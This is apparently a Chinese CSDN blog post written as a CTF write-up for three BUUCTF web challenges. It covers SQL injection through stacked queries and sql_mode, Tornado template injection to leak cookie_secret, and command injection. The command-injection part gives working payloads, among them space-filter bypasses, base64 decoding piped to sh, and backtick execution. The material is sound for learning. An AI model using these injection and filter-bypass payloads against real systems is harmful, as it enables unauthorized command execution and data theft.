BUUCTF部分web题解(easysql,easy_tornado,Ping Ping Ping)

最新推荐文章于 2024-06-08 11:12:41 发布
最新推荐文章于 2024-06-08 11:12:41 发布
阅读量540 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44300286/article/details/108512157
版权
easysql

经过测试,发现过滤了很多东西,但有堆叠注入

在这里插入图片描述

查询语句大概是

select $_GET['query'] || flag from flag

别问我是怎么知道的,问就是看的wp

构造payload:*,1,得到select *,1 || flag from flag,即可查出表中的内容
在这里插入图片描述

还可以用另一种解法:通过堆叠注入,设置sql_mode的值为PIPES_AS_CONCAT,从而将||视为字符串的连接操作符而非或运算符。

1;set sql_mode=PIPES_AS_CONCAT;select 1

得到select 1;set sql_mode=PIPES_AS_CONCAT;select 1 || flag from flag

拓展

在这里插入图片描述
在这里插入图片描述
1 || name被看成了一个整体,上述语句相当于:select A,B from guestbook,由于*代表查询所有内容,故能回显出整个表的内容

@@sql_mode:是一组mysql支持的基本语法及校验规则

select @@sql_mode;	//查看sql_mode
select @@global.sql_mode;	//查看全局sql_mode
select @@session.sql_mode;	//查看当前会话sql_mode

在这里插入图片描述
在这里插入图片描述
语句select 1;set sql_mode=PIPES_AS_CONCAT;select 1 || name from guestbook;有三个部分,select 1;就不用说了,set sql_mode=PIPES_AS_CONCAT;设置sql_mode的值为PIPES_AS_CONCAT,使||变成字符串的连接操作符,最后才能使得select 1 || name from guestbook;能查询成功

easy_tornado

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
三个文件说明了flag在/fllllllllllllag里,filehash=md5(cookie_secret+md5(filename)),现在可以构造:filename=/fllllllllllllag&filehash=?,现在只有知道cookie_secret就可以构造出完整的payload

payload如果没有构造filehash的值就会跳转到一个报错界面在这里插入图片描述
经搜索发现render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。

测试后发现报错界面存在服务端模板注入攻击 (SSTI),
尝试输入?msg={{1+1}},发现不存在运算

之后进行各种尝试与资料获取发现对于tornado框架存在附属文件handler.settings,输入?msg={{handler.settings}}

在这里插入图片描述
然后根据公式:filehash=md5(cookie_secret+md5(filename))构造出:?filename=/fllllllllllllag&filehash=b3dd1774657e49becaf9ed92fcd18eda
在这里插入图片描述

Ping Ping Ping

命令执行,;或管道符(|)分割批量执行命令
在这里插入图片描述
在这里插入图片描述
用cat查看一下flag.php,发现过滤了空格

以下几种方法可以替换空格:

${IFS}
${IFS}$1
$IFS$1 //$1改成$加其他数字貌似都行
< 
<> 
{cat,flag.php}  //用逗号实现了空格功能

不过这里很多东西都被过滤了,还好$IFS$1可以替换成功,但是flag字眼也被过滤了,先查看一下index.php的源码
在这里插入图片描述
这时过滤了什么一眼就可以看出来了,preg_match("/.*f.*l.*a.*g.*/", $ip)匹配一个字符串中,是否按顺序出现过flag四个字母

payload1:拼接命令

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

在这里插入图片描述
payload2:base64编码绕过

?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

Y2F0IGZsYWcucGhw是cat flag.php的base64编码
|base64 -d:对前面的字符串进行base64解密
|sh:把左边的命令交给sh去执行

payload3:内联执行

?ip=127.0.0.1;cat$IFS$1`ls`

将反引号内命令的输出作为输入执行,这样也可以查看flag.php的内容

拓展

管道符

Linux和windows通用的管道符

cmd1 | cmd2 只执行cmd2

cmd1 || cmd2 只有当cmd1执行失败后,cmd2才被执行

cmd1 & cmd2 先执行cmd1,不管是否成功,都会执行cmd2

cmd1 && cmd2 先执行cmd1,cmd1执行成功后才执行cmd2,否则不执行cmd2

在这里插入图片描述
linux还有一个;管道符,作用和&一样

空格过滤

1、${IFS}

${IFS}
${IFS}$1
$IFS$1

在这里插入图片描述
2、重定向符<>
在这里插入图片描述
黑名单过滤

1、拼接
在这里插入图片描述

2、base64编码
在这里插入图片描述

|base64 -d:对前面的字符串进行base64解密
|bash:把左边的输出交给bash去执行
|sh:与bash相似

3、单双引号,反斜杠\,$1$2$@
在这里插入图片描述

obsetear
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUU web -Easysql
m0_52314120的博客
11-15 2370
来自2019年的极客大挑战 题目叫做Easy sql而实际上而非常的简单 首先展示打开后的页面 随即填入后出现报错 题目提示sql注入,首先尝试单引号避开后发现报错 查看源码后尝试or避开判断直接使用php的万能密码 直接得到flag ...
buuctf easy-tornado
ANYOUZHEN的博客
05-26 489
打开后,flag.txt直接说明了,最终的flag在/fllllllllllllag文件下 hints.txt下提示是filehash,要是md5(cookie_secret+md5(filename))才可以结合/fllllllllllllag找到flag 发现他们的url都是由filename和filehash组成。filehash是他们filename的md5值。 当filename或filehash不匹配时,将会跳转到http://web9.buuoj.cn/error?msg=Error ..
BUUCTF:Web-[极客大挑战 2019]EasySQL篇
最新发布
wdnmddbl的博客
06-08 479
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点练习sql注入,推荐使用sql-labs这个靶场,我后续也会更新从开始搭建到攻略1-75关完整教程,早些关注上车哦。大概思路和涉及的知识点(这里我一律复制网上师傅总结的即可,网上的师傅们总结的很完美,我就不东施效颦)思路:文章很详细。
BUUCTF web easy_tornado
H4ppyD0g的博客
09-19 758
网站存在以下三个目录 /flag.txt flag in /fllllllllllllag /welcome.txt render 知识点1: render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。 /hints.txt md5(cookie_secret+md5(filename)) 随便点进去一个,发现url变为?filename=/hin...
BUUCTFWebEasySQL
qq_70434663的博客
02-28 1077
如果我们传入的username为1' or 1=1 #,随便输入password。既然知道了是单引号闭合,现在就尝试注入,首先了解一下万能用户名和密码。会用到以下的句型,如果用户与密码匹配正确则返回真值通过验证成功登录。因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag。所以尝试闭合方法,随便输入1、1'、1''密码随便输入即可。但输入1'时会报错,所以语句为单引号闭合。当输入1和1''时会出现以下的提示,××,××,××为两张表查询字段的数量。一般的,库验证登录注册。
BUU WEB [极客大挑战 2019]EasySQL
star_feather的博客
01-18 165
打开网页,有一个登陆提示,随便输入点什么登陆,显示用户密码错误, 根据题目,我们可以初步判断这是一个SQL注入题目。先来判断一下闭合类型,一般用单引号测试一下: 发现报错: 说明可以用 ’ 来闭合,既然是登陆,那我们就可以尝试一下万能密码登陆试试看: /check.php?username=admin' or '1'='1&password=admin' or '1'='1 直接得到flag: 或者直接在账号密码内输入得flag: ...
leetcode部分题解.rar_java_leet 程序员_leetcode
09-21
《LeetCode部分题解——Java程序员的进阶之路》 在程序员的世界里,LeetCode是一个不可或缺的刷题平台,尤其对于Java程序员来说,它提供了大量的编程挑战,旨在提升算法理解、数据结构掌握以及问题解决能力。这个名...
leetcode题解_leetcode_leetcode题解_
09-29
《LeetCode题解》是广大程序员提升算法能力和解决实际编程问题的重要资源库。它涵盖了大量来自LeetCode在线编程挑战平台的题目,旨在帮助开发者提升在算法、数据结构以及问题解决能力上的技能。LeetCode题解通常包括...
Leetcode 5个经典元素和问题题解_leetcode_leetcode题解_
10-01
本资源包含五个经典的LeetCode问题及其题解,这些题目涵盖了不同的算法类型,是学习和复习编程基础的宝贵资料。下面将详细阐述每个题目及其解题策略。 1. **2Sum (1)**: 这是LeetCode中的经典问题,标签为 "数组" ...
谭浩强C程序设计题解_Vc_
10-03
《谭浩强C程序设计题解_Vc_》是一份专为学习C语言的读者精心编写的参考资料,尤其适用于那些正在使用谭浩强教授的《C程序设计语言(第二版)》进行学习的人群。这份题解PDF包含了书中的习题解答与上机指导,旨在帮助...
西普WEB部分题解
12-09
【标题】"西普WEB部分题解"是一个针对网络安全领域中的Web安全训练平台——西普(CTF)的解题指南。这个资源包含了对西普平台上多种Web安全挑战的解答,旨在帮助那些参与CTF(Capture The Flag)比赛或者希望提升...
web页面实现ping 命令
02-02
在网页上实现ping命令,可以扩展到Tracert命令 在网页上实现ping命令,可以扩展到Tracert命令
BUUCTF-Web:[GXYCTF2019]Ping Ping Ping
m0_56161093的博客
04-26 2118
题目 解题过程 1、题目页面提示?ip=,猜测是让我们把这个当做变量上传参数,由此猜想是命令注入 2、用管道符加上linux常用命令ls(windwos可以尝试dir)试试 所谓管道符(linux)的解释与用法如下: 尝试命令: ?ip=127.0.0.1;ls 看到flag.php,那就使用cat flag.php命令尝试读取 ?ip=127.0.0.1;cat flag.php 被过滤了空格,过滤空格的方法如下: $IFS ${IFS} $IFS$1 //$1改成$加其他数字貌似都行 &l
云演CTF web题型 ping
cadandme的博客
01-19 1952
ping 打开页面提示用GET方式提交ip 尝试管道符分隔命令查看目录,没回显,被禁用 在这里我尝试了好久,忘记有哪些命令分隔符可以代替了,查找后才知道 Linux下一般的命令分隔符有这几个 | || & && . ; - <> $ %0a %0d ` 逐个尝试,%0a可以使用 到这一步,我们就可以看出flag就在fL4g_1s_He4r_______中了,直接查看,得到flag ...
web-[GXYCTF2019]Ping Ping Ping
wojiushilsy的博客
05-14 696
题目要点题目内容解题方法一:命令执行变量拼接方法二:过滤bash用sh执行方法三:内联执行(将反引号内命令的输出作为输入执行) 题目要点 linux常见绕过方法 $IFS$9(空格) 命令执行变量拼接 /?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php 过滤bash用sh执行 echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 内联执行 将反引号内命令的输出作为输入执行 题目内容 解题 打开链接,提示 /?ip在url输入.
BUUCTF WEB [GXYCTF2019]Ping Ping Ping
Y1da的博客
04-10 1489
BUUCTF WEB [GXYCTF2019]Ping Ping Ping 进入题目后根据提示提交?ip=127.0.0.1尝试 回显PING 127.0.0.1 (127.0.0.1): 56 data bytes 判断存在命令执行漏洞,尝试提交?ip=127.0.0.1;ls 回显 PING 127.0.0.1 (127.0.0.1): 56 data bytes flag.php index.php 尝试访问index.php?ip=127.0.0.1;cat index.php 回显f
Web buuctf [GXYCTF2019]Ping Ping Ping
weixin_44214568的博客
08-15 212
1.根据界面提示,在网址上输入参数?ip=1 2.url参数添加注入 分析靶机存在注入,且flag应该是在flag.php中 根据提示,应该是过滤了空格 Linux中绕过空格过滤的方法 ${IFS}替换 $IFS$1替换 ${IFS替换 %20替换 <和<>重定向符替换 %09替换 尝试绕过 可以看出${IFS}存在被过滤的字符,换$IFS$1试试 flag也被过滤? 换一个index.php 从代码中可以看出...
BUUCTF-Web-命令执行-[GXYCTF2019]Ping Ping Ping
weixin_42566218的博客
03-09 4751
BUUCTF-Web-命令注入-[GXYCTF2019]Ping Ping Ping 题目链接:BUUCTF 类型:命令注入 知识点:命令注入黑名单绕过方法 解题方法:6种 解题过程 0x1.base64绕过 目标使用ip变量进行get传参,通拼接符号";"执行ls命令,发现目标过滤了空格 因为是linux环境,使用分隔符$IFS进行绕过 ?ip=127.0.0.1;命令$IFS$1参数 配合cat查看源码,发现过滤了很多绕过黑名单的关键字符,并且对"flag"名称字符串进行严格的过
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2699
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
buuctfmisc题解wireshark
04-10
buuctfmisc是一个CTF比赛中的题目,涉及到网络分析工具Wireshark的使用。Wireshark是一款开源的网络协议分析工具,可以用于捕获和分析网络数据包。在buuctfmisc题目中,可能需要使用Wireshark来解析和分析给定的网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值